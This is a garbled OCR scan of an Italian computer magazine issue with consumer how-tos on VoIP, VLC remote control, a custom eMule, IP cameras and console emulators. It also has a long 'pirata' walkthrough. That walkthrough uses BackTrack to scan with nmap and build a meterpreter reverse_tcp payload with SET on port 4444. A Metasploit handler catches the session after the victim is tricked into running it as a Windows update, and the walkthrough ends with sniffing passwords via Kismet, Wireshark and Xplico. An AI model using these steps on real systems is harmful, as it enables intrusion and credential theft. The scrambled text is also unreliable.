1 ABC 2 oer 3 


Ad C. 


x Impostiamolo a dovere 

g Avviamo X-Lite e andiamo in Account Settings. Spostiamoci 
nella schermata Account. In User ID inseriamo TURI (identifi¬ 
cativo Client SIP), In Domain digitiamo sip.messagenet. it:506l In 
Password digitiamo la password associata alla nostra numerazione 
FreeNumber (Passo A3) e cucchiamo OK per salvare le impostazioni, 


x Chiamiamo e riceviamo dal PC 

0 Se il firewall ci chiedesse rt abilitare l'accesso all'applica- 
- J zione, confermiamo. OraX-Lrte èprontoe può essere usato 
per chiamare e ricevere su un computer dotato di microfono e cuffie 
(o altoparlanti) Per effettuare la nostra prima chiamata (gratuita ver¬ 
so altri utenti Messagenet), comportare i numero e premiamo Cali. 



VIDEOCHIAMA 

GRATIS 

Il metodo migliore per ef¬ 
fettuare videochiamate 
utilizzando il computer è 
installare Skype (www. 
sKype.com). Chiunque 
abbia sul proprio PC il 
dient può raggiungere 
gli altri utenti del ser¬ 
vizio semplicemente 
diccando sul pulsante 
Videochiama presente 
nella scheda del contatto 
selezionato. 

SMS A COSTO ZERO! 

Per l'invio di messaggini 
il Web sa offrirà un servi¬ 
zio completamente a co¬ 
sto zero. Basta andare su 
www.freesms.net ed ef¬ 
fettuare la registrazione 
gratuita al servizio. Dopo 
aver eseguito il login, 
non dovremo far altro 
che sefezionare il Paese, 
inserire il numero del 
destinatario e compilare 
il messaggio. Al termine 
non ci resterà che inserire 
anche il codice di verifica 
mostrato nella pagina 
e completare l'invio al 
destinatario. 



TELEFONATE 
VERSO FISSI 
E CELLULARI 


È possibile effettuare 
chiamate verso numeri 
non Messagenet,a ta¬ 
riffe molto vantaggiose 
(consultabili su www. 
messagenet.it/voip/ 
tariffe). È necessario, 
però, disporre di un cre¬ 
dito: possiamo effettua¬ 
re una ricarica on-line 
accedendo al sito col 
nostro account e cuccan¬ 
do Ricarica. Scegliamo 
il taglio della ricarica 
e premiamo Ricarica. 
Proseguiamo con Por 
alla cassa e scegliamo il 
metodo di pagamento 
(Carta di credito o Boni¬ 
fico bancario). 


► 
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COMANDARE IL COMPUTER CON IL CELLULARE 



NON SOLO 
ANDROID 


VIC Remote e presente 
anchesuAppStoreed 
è disponibile in due 
versioni: frte (gratuita) 
e Pro. A differenza della 
versione per Android, 
quella per iPhone, iPod 
e iPad assicura le stesse 
funzioni solo agli utenti 
che scelgono di installa¬ 
re VIC Remote Pro. 


QUANDO LA 
SCANSIONE 
AUTOMATICA 
FALLISCE 


Qualora la scansione 
del Server Vie non dia 
esito positivo, possiamo 
tentare di stabilire la 
connessione indicando 
manualmente l'indi¬ 
rizzo del PC su cui è in 
esecuzione Vie. Per 
conoscerlo, sul compu¬ 
ter andiamo in Start/ 
[segui, digitiamo cmd 
e cucchiamo Invio. Nel 
prompt dei comandi 
digitiamo iptonfiq (In 
rio) quindi prendiamo 
nota dell'indirizzo IPv4 
assegnato al PC (es: 
192.168.1.192). Avvia 
mo VIC Remote sullo 
smartphone e tappiamo 
sulla voce Aggiungi 
server Vl(. Inseriamo 
l'indirizzo IP nella 
casella Home iistema o 
indirizzo IP e salviamo 
(OK). Riavviamo VIC 
Remote e tappiamo sul 
server VIC che abbiamo, 
aggiunto pocanzi. 


Un telecomando per il tuo PC 

Così usi il telefonino per gestire a distanza software e applicazioni multimediali. Ecco come fare 
con VLC e un’app per smartphone Android. 




-a. Il player sul PC 

1 Preleviamo VLC dal CD-Rom e avviamo il file exe contenuto 
v - nell'archivio Rispondiamo Si qualora il prompt UAC lo richieda, 
cucchiamo flfcjjsegiiamo con Avanti (due volte). Dal menu Seleòm- 
rer/llpod’/f^ffitfltoidichiamo Completa o premiamo Avanti, quin¬ 
di Installa e Finiti. C. Évwfe ^itonzziamone l'accesso a Internet (OK< 


IrtfWfKC* (*inC19tfl 


^ Passiamo al telefonino! 

2 Colleglliamo a internet il nostro smartphone Android e awia- 
. mo l'app Play Store. Tappiamo sulla lente d'ingrandimento 
e digitiamo VLC Remote Scegliamo il primo dei risultati in elenco 
(Remote for VLC) e procediamo con l'installazione tappando prima 
su Scarica e, nella nuova pagina su Accetta e Scarica poi sii OK. 


* \ Comandi avanzati 

3 Sul PC avviamo VLC, andiamo in Strumenti/Preferenze e 
— selezioniamo Tutto nel campo Mostra le impostazioni in 
basso. Espandiamo la voce Interfaccia selezioniamo Interfacce prin¬ 
cipali e spuntiamo Interfaccia di controllo a distanza HTTP Confer 
miamo le modifiche (Salva) e lasciamo VLC in esecuzione. 


^ Connessi in rete 

4 Attiviamo il Wi-Fi sullo smartphone e colleghiamoci alla stes¬ 
sa rete utilizzata dal PC, avviamo l'applicazione VLC Remote e 
attendiamo che la scansione della rete locale rilevi il computer su cui 
è in esecuzione VLC. Nell’elenco Servet VLC troveremo un risultato, 
tappandolo visualizzeremo l'interfaccia principale del telecomando. 



Intere olavlist sotto controllo 

Sullo smartphone tappiamo Raccolta per navigare tra le car- 
— telle neH'hard disk del PC. Raggiungiamo il file da nprodurre e 
tappiamo sul titolo: VLC avvierà la riproduzione del file. Per creare un 
elenco di riproduzione, facciamolo dal menu contestuale (pressione 
prolungata sul nome del file) scegliendo la voce Aggiungi alla playlist. 


* Il telecomando è qui 

g Tappiamo In esecuzione per visualizzare i controlli di ripro¬ 
duzione. Con i comandi in basso interrompiamo/riprendiamo 
la riproduzione, passiamo al file piecedente/successivo e avanziamo 
veloce. Al centro c’è la slitta per il volume, in aito i pulsanti per visua¬ 
lizzare lo schermo intero e attivare la riproduzione ciclica o casuale. 
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Hackeriamo Windows! 


PC e Smartphone degli Hackerf 


ATTIVARE UN CANALE D’ACCESSO SICURO PER IL P2P 


File sharing con Powerup! 

Con la versione di eMule sviluppata ad hoc dagli esperti di Win Magazine scarichi alla massima velocità, in perfetto 
anonimato ed esclusivamente da server sicuri. 



^ Mulo griffato Win Magazine ^ Accesso consentito 


^ Le regole giuste 



3 I Estraiamo su desktop il file SimpiePoriFW 
zip (presente sul CD-Rom), apr iamo la cartel 
la ed eseguiamo il file spf.exe. Dal menu Rotitene le 
zioniamo il modello in nostro possesso, digitiamo, se 
richiesto, Usemamee Password di accesso al router 
e clicchiamo sul tasto + in basso. 


-.1 • JL '> f, ? 9 9 J* 


■| i Estraiamo su desktop l'archivio Win-eMule 
zip (presente sul CD-Rom) aprìano la cartel¬ 
la appena estratta e lanciamo il file InstWBÉÈidLS nic¬ 
chiamo tre volte su Avanti. 
sta di autorizzazionhe, al tennine. usciamo 
cedura con Chiudi 


2 II collegamento a Win-Emuie è stato aggiun 
to al menu Start, avviamo il software e clic 
chiamo OK e Si. Un avviso del firewall ci chiede se 
sbloccare il Mulo, ovviamente clicchiamo su Consenti 
Clicchiamo su Preferenze, spostiamoci su 
e prendiamo nota dei valori TCP e UPD 


* Entrambe le porte 

4 Clicchiamo Add Custom. in tòme digitiamo 

Win-eMule. in Type selezioniamo TCPe digi¬ 
tiamo lo stesso valore TCP reperito nel Passo 2 nei 
campi Start Porte End Port Clicchiamo su Add. scri¬ 
viamo Wm-eMule2 nel campo tòme, selezioniamo 
UDP, digitiamo il valore UDP corretto e clicchiamo Add 


^ i Solo server affidabili 

g Ritornati a Win-eMule, clicchiamo Aggior¬ 
na i server sicuri Dal menu URL seleziona 
mo www.winmagazine.it/lmk/1205. Se siamo utenti 
Fastweb, spuntiamo la relativa casella e scegliamo uno 
degli URL presenti in elenco. Clicchiamo su Aggiorna. 
scegliamo un server e premiamo Connetti 


E vai col download! 

g i Stabilita la connessione clicchiamo Cerca. 
digitiamo il file da cercare nel campo Nome. 
selezioniamo la tipologìa ( Tipo), e clicchiamo Inizia. 
Per scaricare un file tra quelli in elenco basta un dop¬ 
pio clic. Spostandoci in Downloads. potremo monito 
rare velocità e stato dei trasferimenti. 


UN ANTIVIRUS PER WIN-EMULE 


Terminata l’installazione di Win-eMule, è op¬ 
portuno configurare correttamente l’antivirus 
in modo da attivare il controllo automatico e 
costante di tutti i nostri download. Per farlo, nel 
nostro caso con Avast Free (lo trovi sul CD-Rom), 
dall'interfaccia principale di Win-eMule premia¬ 
mo Preferenze, spostiamoci in Win-eMule: nel 
campo Antivirus per eMule, individuiamo la 
directory di installazione di Avast, selezionia¬ 
mone l’eseguibile e premiamo Apri. Torniamo 
all'interfaccia principale di Win-eMule e clicchia¬ 
mo sul pulsante Scansione antivirus presente 
subito sotto la barra strumenti del programma: 
verrà così caricato l’antivirus. Spostiamoci nella 


sezione PROTEZIONI IN TEMPO REALE e sele¬ 
zioniamo Protezione P2P. 

Clicchiamo Impostazioni Avanzate. Nella scher¬ 
mata che appare verifichiamo che siano spuntate 
le voci eDonkey ed eMule. Spostiamoci nella 
sezione Azioni, apriamo il tab PUP e nei menu Se 
l'azione fallisce impostiamo Chiedi nel primo ed 
Elimina nel secondo. Spostiamoci in Sospettie 
impostiamo la prima azione da attuare nel caso 
di rilevazione di file potenzialmente dannosi su 
Ripara. Come seconda azione, nel caso la ripa¬ 
razione dovesse fallire, impostiamo Sposta nel 
cestino Come terza azione scegliamo Chiedi 








































































V PC e Smartphone degli Hacker 


Hackeriamo Windows! 


VIDEOSORVEGUARE CASA CON LA TUA WEBCAM 

i 

Win 

dowsd 

iv 

en 

ta un antifurto 


Ecco come usare una IP Cam (nel nostro caso una D-Link DCS-932L) per realizzare un sistema di videosorveglianza. 
Così controlli casa dal cellulare anche quando ti trovi al mare e in montagna! 



^ Installazione veloce 

' Prendiamo il CD-Rom presente nella confe- 
• zione della IP Cam D-Link DCS-932L e inse¬ 
riamolo nel lettore del PC. Attendiamo quindi l’awio 
automalico del software di configurazione sceglia¬ 
mo l'opzione Installazione semplificata i 
Confermiamo quindi con un clic sul pulsar! 





WPS? No. grazie 

2 Colleghiamo ora I IP Cam alla rete elettrica e al 
router ADSL. utilizzando il cavo fornito in dota • 
/ione. Spostiamoci nuovamente sul PC e selezioniamo 
No il router in uso non dispone di un pulsante WPS. 
Continuiamo con la configurazione guidata del dispo¬ 
silo cliccando sul pulsante Avanti. 


f * rU. 


+ La ricerca abbia inizio 

2 | Verifichiamo che il LED presente nella parte 
....•■ ; anteriore dell'IP Cam sia di colore verde e con¬ 
fermiamo con Sì. Parte la ricerca del dispositivo all’in¬ 
terno della rete interna: questa operazione può durare 
anche diversi minuti e varia a seconda del numero di 
periferiche presenti nella LAN. 


^ IP Cam rilevata! 

4 ; Se la ricerca restituisce un esito positivo, i dati 
relativi all'IP Cam vengono riassunti all’inter¬ 
no di una tabella nella quale è indicato anche l'in¬ 
dirizzo IP assegnato dal router (nel caso in figura 
192.168.2.189) Proseguiamo con la configurazione 
guidata cliccando ancora una volta su Avanti. 



Visione protetta 

5 l Scegliamo ora uno username e una pas- 
1 sword necessari all'accesso all’interfaccia 
Web dell'IP Cam (raggiungibile digitando nella barra 
degli indirizzi del browser l'indirizzo IP assegnato dai 
router). Dopo aver compilato tutti i campi richiesti pro¬ 
seguiamo con un die sul pulsante Avanti. 


o senza fili! 

Selezioniamo la voce Wireless come modalità 
di connessione per la videocamera. Attendia¬ 
mo qualche secondo affindié la ricerca delle reti senza 
fili disponibili nei paraggi dell'IP Cam vengano rilevate. 
Selezioniamo quella di nostra proprietà ed inseriamo la 
chiave d'accesso. Proseguiamo con Avanti 



* j Creazione deH’account 

7 ] Alla domanda Si dispone di un account 
mydlink? spuntiamo No e inseriamo un indi¬ 
rizzo e-mail. Indichiamo una password e forniamo 
nome e cognome. Accettiamo le condizioni d'uso e 
confermiamo con Avanti Alla scheda riassuntiva del 
nostro account, confermiamo con un clic su Fine 


^ L’app per il telefonino 

g Entra ora in gioco il nostro smartphone 
' Androidi accediamo al Play Store e cerchia¬ 
mo l'app gratuita Mydlink Lite. Tappiamo su Scarica 
e confermiamo download e installazione con Accetta 
ed installa Attendiamo dunque qualche secondo fino 
al completamento dell'operazione. 


Che la visione abbia inizio! 

0 Non ci resta che ricercare nel menu principa- 
— le del nostro telefonino l'applicazione appena 
installata ed avviarla. Inseriamo nei due campi presen¬ 
ti username e password scelti durante la fase di regi¬ 
strazione al servizio Mydlink (Passo 7) e confermiamo 
con un tap su Accesso Siamo pronti a spiare casa! 
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Hackeriamo Windows! 


PC e Smartphone degli Hacker fr 


INSTALLARE I GIOCHI DELLA CONSOLE ANCHE SU PC 


Gioca alla Wii, ma sul tuo PC 

Grazie all’emulatore Dolphin trasformiamo il nostro computer nella console di Nintendo per giocare alla grande 
ai principali titoli per Wii. Ecco come effettuare la modifica. 



▲ S carichiamo l’emulatore 

■j ; Per scaricare il nostro emulatore andiamo su 
- J www.doiphin-emulator.com e scostiamoci 
nella sezione Download Cicchiamo, q vdVitl link 
per la versione compatibile col nostro S 
mo ora il pacchetto "Visual C++2010 RedìZtril 
ble SPI (x64) da-www winmagazine.it/link/158i 
installiamolo. 



Generale Miglioramene ‘ Hacks . Avanzale 

Migliorami 



Internai Resotuhon 

U Native l640tóZ8j 
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Anti-Aitasing 

Nessuno/a * 


Fittro An;so tropico 
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, !'«?! Scalea EFB Copy 

Der-hxei Lightmg 


Porce Testure Filtenng 

1 30 Vision 



^ Configuriamo i giochi 

2 Scompattiamo l'archivio compresso e faccia* 

... mo doppio clic sul file Dolphin.exe per avviare 
l’emulatore della Wii. Cucchiamo sul pulsante Config 
e spostiamoci nella scheda Percorsi Qui dobbiamo 
cificare la cartella in cui abbiamo salvato le ISO 
in modo che siano mostrati nella finestra 
le di [ 



^ La grafica è OK 

^ Selezioniamo la scheda grafica e spostiamoci 
nel pannello Miglioramenti. Da qui possiamo 
attivare o meno \ Anti-Aliasing mentre in Hacks pos¬ 
siamo disabilitare la nebbia. Per non avere problemi 
all'inizio, possiamo lasciare tutte le impostazioni come 
di default e poi eventualmente cambiarle dopo aver 
verificato la funzionalità dell’emulatore 


^ Configuriamo il controll er 

Sj f Andiamo in Opziom/lmpostazioni Wiimote in 
Wiimote 1 selezioniamo il tipo di controller da 
usare: se abbiamo un vero Wiimote scegliamo Wii¬ 
mote Reale altrimenti selezioniamo Wiimote Emulato 
Giochiamo quindi su Configura per configurare i vari 
pulsanti del controller in base alle nostre preferenze e 
salviamo con OK 


▲ I primi settaggi 

2 I Andiamo in Generali e se abbamo un PC len- 
J to impostiamo Limite FPS su OFF Usciamo 
da Config e premiamo il pulsante Video Si apre qurt 
il pannello di conligurazione per la grafica. Le imposta¬ 
zioni andranno calibrate m base alle performance da 
nostro PC. Da Generali possiamo impostare la risolu¬ 
zione per il nostro monitor. , 



-a Avviamo il gioco 

§ Se abbiamo configurato la cartella contenen - 
. . te le ISO, nella schermata principale di Dol¬ 
phin visualizzeremo i nostri giochi: un doppio clic e 
l'emulatore lo caricherà sul PC. Altrimenti clicchiamo 
sul pulsante Apri per selezionare manualmente l'ISO. 
Possiamo trovare l'elenco dei giochi compatibili con 
Dolphin su www.winmagazme.it/link/1582. 


COME INSTALLARE L'EMULATORE PER LA PLAYSTATION 2 


In questo caso è possibile servirsi di PCSX2 
scaricabile da http://pcsx2.net, ma occorre 
anche procurarsi il Bios della PS2. Su Internet 
ci sono diverse guide per farlo, e cè anche 
chi riesce a procurarselo dai soliti canali di 
file sharing. Tutto diventa più facile se si 
scarica il pacchetto completo di PCSX2 e 
lo si installa sul PC. Al primo avvio partirà la 
configurazione guidata dell'emulatore che 
permetterà di impostare le varie sezioni tra 
cui anche i tasti del controller. Proseguendo 
con Next si dovrà selezionare il Bios estratto 


dalla propria PS2 e terminare con Finish. 
A questo punto si può andare in Config/ 
Emulation settings da cui si possono mo¬ 
dificare le impostazioni per il processore. 
Al termine non ci resta che andare in CDVD/ 
Iso Selector/Brovne e selezionare l'immagi 
ne ISO del gioco. Dal menu System clicchia¬ 
mo su Boot CDVD (full) per avviare il gioco 
e iniziare a divertirci. Su http://pcsx2.net/ 
compatibility-’ist.html è possibile invece 
trovare una lista di giochi compatibili con 
l'emulatore PCSX2. 
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Cosaci rs 
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backtrack-lmux.org 


I l rischio più probabile a cui andiamo in¬ 
contro ogni volta che usiamo un PC è che 
i nostri dati vaghino in giro per la Rete, 
finendo nelle mani sbagliate. A quel punto, 
chiunque abbia un minimo di conoscenze 
tecniche e sia a conoscenza del nostro indi¬ 
rizzo IP, riuscirà ad analizzare l'intero traffico 
di rete, inclusi i siti Web che raggiungiamo 
o le password che digitiamo. Per farlo, può 
intraprendere differenti strade ma senza 
ombra di dubbio la più conosciuta, rapida e 
funzionale è quella di sfruttare le vulnerabi¬ 
lità del sistema operativo che utilizziamo. 

imi operativi a rischio 

precisare che i I pirata preferisce avere 
'f^^con gli utenti Windows che, fra gli 
OS [riconosciuti, è di sicuro quello più a 
rischio e sul quale ò più semplice installare 
una backdoor per farsi poi spazio ncll'hard 
disk. Ma non dobbiamo dimenticare che Mac 
OSX o lo stesso Linux non sono esenti da tale 
problematica: ogni sistema operativo ha, 
infatti, il suo tallone d’Achille e l’unica arma 
che abbiamo a disposizione per d i fenderci è 
quella di conoscere tutte le vulnerabilità del 
sistema che utilizziamo. K poi c'è Facebook, 
il luogo preferito non solo da milioni di utenti 
sparsi per il mondo ma anche dai pirati asse¬ 
tati di dati altrui. Riuscire a creare un clone 
perfetto deU'home page del social network in 
blu è veramente un gioco da ragazzi e ai pirati 
basta poco per dirottarci su queste pagine 
fasulle dove, ignari del pericolo incombente, 
andremo ad effettuare il login usando user- 
nantee password del nostro account! Come 
difendersi? Imparando ad usa re le stesse armi 
d'attacco dei pirati! Immergiamoci, dunque, 
in questa nuova avventura, analizzando ogni 
singolo caso e ogni possibile minaccia: solo 
così riusciremo a creare un’invalicabile linea 
di difesa. 


Hacker 
segreto 

Abbiamo “smanettato” con il kit 
che buca la rete e attiva un canale 
autorizzato sul PC del malcapitato 











□ Grimaldello da taschino 


Lo strumento preferito dai pirati per intrufolarsi nei computer altrui è la distribuzione BackTrack Linux: semplice 
da usare e ricca di tool adatti allo scopo, può essere installata anche su chiavetta USB. 



MnnALITA UVE PVP 


▲ Tutto su un DVD 


Dentro al BIOS 


^ Avviamo la distro 



■| I Sul Web DVD è presente il file BT5R1- 
GNOME-32-iso con l’immagine della 
distribuzione da masterizzare. Inseriamo un DVD 
vuoto nel masterizzatore, awianJJi^hfcBur- 
nmg Rom e cucchiamo su Masteri 
vi immagine. • 


MODALITÀ USB 


2 Terminata la masterizzazione, riawiamo il 
PC. Accediamo al BIOS premendo Cane e 
impostiamo il boot da periferica DVD. L’operazio¬ 
ne varia in base al tipo di scheda madre installata 
nel computer. Inseriamo quindi nel lettore il disco 
fll BackTrack e riawiamo nuovamente il PC. 


3 Verrà caricata la distribuzione. Nella schei 
mata di boot che appare selezioniamo Bac¬ 
kTrack Texte confermiamo con Invio Digitiamo 
il comando startx. premiamo Invio e attendiamo 
il caricamento dell’interfaccia grafica. La distro e 
pronta per essere usata in modalità Live DVD. 


- Usiamola da chiavetta 

-j i Colleghiamo una pendrive con almeno 4 GB 
di spazio libero ad un ingresso USB disponi- 
: ìe sul computer e cucchiamo sul pulsante Instali 
BackTrack 5 RI presente sulla Scrivania. Selezio¬ 
narne quindi la lingua Italiano e avviamo la proce¬ 
ra guidata con un clic sul pulsante Avanti 


* Partizioni da smontare 

2 Proseguiamo fino a raggiungere la sche¬ 
da Disposizione della tastiera. Scegliamo 
l'opzione Italia e rispondiamo cliccando su S/alla 
domanda Smontare le partizioni in uso Casi facen¬ 
do potremo installare BackTrack 5 RI anche sulla 
pendrive USB collegata precedentemente al PC. 


^ La pendrive è pronta! 

3 Clicchiamo su Avanti fino a raggiungere la 
scheda Preparazione spazio su disco Sce 
gliamo l'opzione Cancella e usa l’intero disco tra 
quelle proposte. Dal menu a tendina selezioniamo 
la penferica USB (indicata con sdb) e confermiamo 
premendo ancora una volta il pulsante Avanti. 



Rendiamola awiabile 

4 Prima di procedere all'installazione definitiva della distro, clicchiamo 
sul pulsante Avanzato. Abilitiamo l'opzione Installare il boot loadern 
selezioniamo dal menu a tendina la pendrive USB (nel nostro caso, clicchia¬ 
mo / dev/sdb ) Confermiamo con un clic sul pulsante OK 


a Installazione in corso 

Cj Non rimane che ' xare sul pulsante Installa e attendere che l'instai- 
•’ lazione venga correttamente portata a buon fine. Completata la pro¬ 
cedura guidata, potremo ravviare il computer ed effettuare il boot dalla peri¬ 
ferica USB, impostando la voce corretta nel BIOS (Passo 2). ► 
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^ Tutto da linea di comand o 

■J Avviata una nuova sessione del Terminale. 
il pirata accede con cd alla directory pen- 
test/expioits/sete impartisce il comando ./set per 
avviare il software Set. Sceglie l'opzione 4 per cre¬ 
are un payload e un listener (una lista di operazioni 
da eseguire) da iniettare nel PC della vittima, 


^ Obiettivo: Windows 

2 ' Supponendo che il pirata voglia colpire un 
• . PC con sistema operativo Windows (quello 
rilevato in precedenza da Nmap). il pirata digita 2 
e conferma con Invio per scegliere l'opzione Win¬ 
dows Reverse_ TCPMeterpreter (mediante il qua¬ 
le controllerà il PC vittima da Terminale). 


^ Una porta d’ingresso 

3 j A questo punto, il pirata crea un file esegui 
1 bile capace di sfruttare una backdoor attiva 
sul PC bersaglio. Digita quindi 16 e conferma con 
Invio. Indica una porta di ascolto (nel nostro caso 
abbiamo scelto la 4444) e preme nuovamente 
Invio. Attende dunque che I'. e/e venga generato. 


13 Accesso non autorizzato 

Grazie al programma Nmap, il pirata rileva l’indirizzo IP e il sistema operativo della vittima. In questo modo potrà 
identificare facilmente i punti deboli del computer attaccato per usarli a proprio vantaggio. 


Scansione in corso 

; Ottenuto l'accesso alla LAN et: e e<~ .jj 
-. ’ ta la vittima, il pirata avvia il Terminf 
digita il comando nmap -sP - PT80 seguito dàT 
range di indirizzi IP da scansionare (nel caso in 
esempio, da 192.168.114.1 a 192.168.114. Uh. 
Conferma con Invio e attende il risultato 


Porte aperte sul PC 

Osservando l'output ottenulo, decide di 
analizzare ogni singolo IP rilevato. Digita 
do nmap -sS seguito dall'indirizzo della 
vittifKT(nelùQgipio, 192.168.114.1) e attende 
che Tei&ioQmuMÈiaH porte aperte sul PC 
della vittima venKJsiÉt&a» schermo. 


a; OS rilevato! 

3 ; Il pirata continua la sua fase di analisi cer- 
— J cando di scoprire quale tipo di sistema 
operativo è utilizzato sul computer della vittima. 
Digita quindi il comando nmap -0 seguito dall'in¬ 
dirizzo IP (nel caso in esempio. 192.168.114.1) e 
attende che venga visualizzato il verdetto. 


i3 Rete bucata in tre mosse 

Le falle di sicurezza degli OS più diffusi consentono al pirata di intrufolarsi agevolmente nel nostro PC. Per farlo, 
deve prima creare un “payload”, cioè un programma per l’accesso da remoto. Ecco in che modo. 
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Creata la backdoor, il pirata sfrutta alcune tecniche di ingegneria sociale per installarla sul PC 
della vittima. Per riuscire a prendere il controllo del sistema da remoto, usa il tool Metasploit. 



^ ; Il file fondamentale 



•j Usando il (ile manager di BackTrack, il pirata raggiunge 
la directory set in pentest/exploits con il comando cd. 
Copia quindi il file msl.exe creato in qecedenza (Passo C3) e, 
tramite pratiche di social engineering!lo tr^risce sul PC della 
vittima, avviandolo: 


^ i Metasploit in azione 

2 A questo punto, il pirata avvia una sessione del Termina- 
. : le e con il comando cd raggiunge il percorso /opt/frame 
work/msf3. Digita il comando ,/msfconsole per avviare il sof¬ 
tware Metasploit, che utilizzerà per controllare anche da remoto 
il sistema della sua vittima. 
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^ Ecco la porta d’accesso 

2 II pirata lancia prima il comando use exploit/multi/han- 
dler e poi set payload windows/meterpreter/reverse _ 
top. Indica l'indirizzo IP della vittima con set Ihost (ne I caso in 
esempio, 192.168.114.1) e la porta configurata in precedenza 
(Passo C3) con set Iport 4444. 


... Traguardo raggiunto! 

4 . Il pirata dà il comando exploit e attende che la vittima 
awii il file msf.exe. magari facendole credere che si tratti 
dì un update di Windows. Non appena il pesce avrà abbocca¬ 
to, Metasploit restituirà un messaggio di conferma e avvierà il 
meterpreter creato dal pirata! 


ENGINEERING 

l'ingegneria sociale è 
un Insieme di tecniche 
adottate dai pirati 
informatici (e, più in 
generale, dai truffatori) 
per venire a conoscenza 
delle informazioni 
personali delle loro 
vittime. 

EXPLOIT 

Con questo termine 
si identifka un codice 
che, sfruttando un bug 
o una vulnerabilità 
del sistema operativo 
attaccato, porta all'ac¬ 
quisizione di privilegi di 
amministratore. 

BACKDOOR 

Si tratta di una porta di 
comunicazione aperta 
sul sistema vittima che 
permette di bypassare 
le eventuali protezioni 
attive. 

PAYLOAD 

Letteralmente, carico 
utile. Indica quella 
parte di codice di un 
maturare che svolge il 
"lavoro sporco'', cioè 
le operazioni che 
permettono al virus 
di infettare il sistema 
dell'utente. 
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^ : Nel PC della vittima! 

g II pirata ha ora a disposizione una serie di comandi che 
. può usare per controllare da remoto la copia di Windows 
7 installata nel PC del malcapitato. Per scoprirli, digita help. Per 
catturare ad esempio una schermata del desktop, gli basta sem¬ 
plicemente lanciare il comando screenshot. 


a. Pieno controllo 

0 Può inoltre avviare e gestire il Prompt dei comandi di 
Windows digitando semplicemente il comando execute 
-fcmd seguito da Invio o addirittura spegnere il PC della vittima 
lanciando il comando shutdown E non c'è antivirus o firewall 
che tenga: anche Windows 7 è stato bucato! 


► 
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01 Password e codici di accesso 

Dopo aver ottenuto l’accesso al sistema attaccato, il pirata riesce a catturare tutti i dati in transito sulla nostra 
rete senza fili, per poi analizzarli vedendo in chiaro password e non solo! 


Una soia in rete 

•J | In BackTrack il pirata avvìc 
sessione del Terminale e digita il cofl 
do kismel per awiare il tool di sniffing (analisi def 
traffico) di rete. Alla domanda Start Kismet Server 
risponde Yese attende qualche secondo affinchè 
il software si configuri automaticamente. 


Wireless sotto controllo 

Quando viene richiesta l'aggiunta di un'in¬ 
terfaccia di rete, il pirata conferma con 
mpila il campo Intf con il nome assegna- 
ihaiPtenza fijijad esempio, wlanO) e 
:ere le interfacce di 


indo iwconfig. 


9 In ascolto sulla 


Sniffino in corso 

2 Kismet è pronto e operativo. Tutti i pac- 
~~ chetti trasmessi ini rete e catturati vengo¬ 
no visualizzati nell'interfaccia grafica principale 
del software. Quando il pirata avrà raggiunto la 
quantità di dati desiderata, può fermare la cattura 
con Disconnect presente nel menu Kismet 


Il nemico potrebbe anche nascondersi all’interno della nostra rete locale interna e, utilizzando Wireshark, riuscire 
a sniffare i pacchetti che viaggiano via cavo. Ecco la tecnica utilizzata. 



^ Il to ol giusto 

Il pirata raggiunge la voce Wireshark dal 
menu Applications/BackTrack/Informa- 
tion Gathering/Network Analysis/Network Traf- 
ficAnalysis Avvia quindi il software verificando di 
essere in possesso dei privilegi di amministratore e 
clicca su List thè available capute interfaces. 



± t Ecco i pacchetti! 

2 Sceglie fra ethO o wlanO e avvia il processo 
cuccando Start Lo sniffing ha inizio: tutti i 
pacchetti in transito vengono visualizzati nell’in¬ 
terfaccia principale di Wireshark. Quando il pirata 
avrà raggiunto il suo obiettivo, ferma il processo 
cliccando Stop thè running live capture 



* É tutto memorizzato 

3 A questo punto il pirata si sposta nel menu 
File e seleziona l'opzione Save per salva¬ 
re una copia di tutti i pacchetti catturati Indica un 
nome ed una directory di destinazione e termina 
con un clic sul pulsante Save Può quindi chiude¬ 
re Wireshark. 
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PC e smartphone degli Hacker^ * 



Inizia l’analisi dei dati 



Dopo aver sniffato il traffico di rete, per il pirata è giunto il momento di “tradurre” tutti i pacchetti 
criptati. Ecco come e cosa fa per leggere in chiaro e-mail, messaggi di Chat e cronologia Web. 



a j L’interprete dei dati 

■j Per rendere leggibili i dati sniffati dalla rete, il pirata usa 
‘ il tool Xplico. Per avviare la comoda interfaccia Web di 
gestione, raggiunge la voce xplico web gui presente nel menu 



^ Accesso in corso 

3 II pirata digita http://localhosl:9876 nella barra indiriz- 
■' zi di Firefox (preinstallato in BackTrack), Nell'interfaccia 
Web di Xplico decide di autenticarsi usando xplico come User- 
name e xplico come Password Non gli rimane altro da fare che 
confermare con un clic su Login 


* Xolico è operativo 

2 A questo punto, il pirata apre una nuova scheda del Ter¬ 
minale e avvia Xplico lanciando il comando /etc/init.d/ 
xplico start seguito da Invio Attende qualche secondo affinché 
il servizio venga correttamente eseguito e avvia il browser senza 
chiudere la finestra del Terminale. 



Un caso da analizzare 


4 Appare quindi il menu principale dell'interfaccia Web di 
Xplico. Il pirata clicca sul pulsante New Case e, nella 
sezione Data Acquisition, sceglie l'opzione Uploading PCAP 
capute file/s. Assegna un nome al caso da analizzare e confer¬ 
ma la sua creazione con un clic su Create. 


UNOSNIFFER 

ALTERNATIVO 


Finora abbiamo visto 
tome il pirata utilizza 
strumenti del calibro di 
Kismet o Wireshark per 
sniffare tutto il traffico 
in transito su una rete. 
Tali software, grazie al¬ 
la presenza di un'inter¬ 
faccia grafica risultano 
alquanto semplici ed 
intuitivi. Ma, torneai 
solito esiste qualcosa 
di alternativo che 
funziona direttamente 
da linea di comando. 
Stiamo parlando di 
Tcpdump, un ottimo 
snifferanch'esso inte¬ 
grato in BackTrack S 
RI e comunque instal¬ 
labile su tutte le altre 
distribuzioni Linux. 
Nonostante sia privo di 
interfaccia grafica, il 
suo utilizzo è vera meri 
te semplice: al pirata 
basta infatti lanciare 
da Terminal* il coman¬ 
do tcpdump per avviare 

10 sniffer che catturerà 
dunque tutto ciò che è 
in transito sull'interfac¬ 
cia ethO. Per affinare la 
sua opera, utilizzando 
magari l'interfaccia Wl- 
FI, il pirata scopre una 
completa lista delle 
opzioni disponibili con 

11 comando tcpdump 
-htlp. 



* Una nuova sessione 

g II pirata seleziona il caso appena creato e clicca sul pui- 
. ‘ sante New Session presente nel menu a lato dell’inter¬ 
faccia Web di Xplico. Fornisce un nome al processo (ad esem¬ 
pio. decodifica) e conferma con un clic su Create. Fatto questo 
accede alla sessione appena creata. 


I dati sono in chiaro! 

g I II pirata si sposta iti Pcap sete preme Browse per cari- 
— care l'output restituito da Wireshark o Kismet. Conferma 
con Uploade attende che i pacchetti vengano decodificati. Ogni 
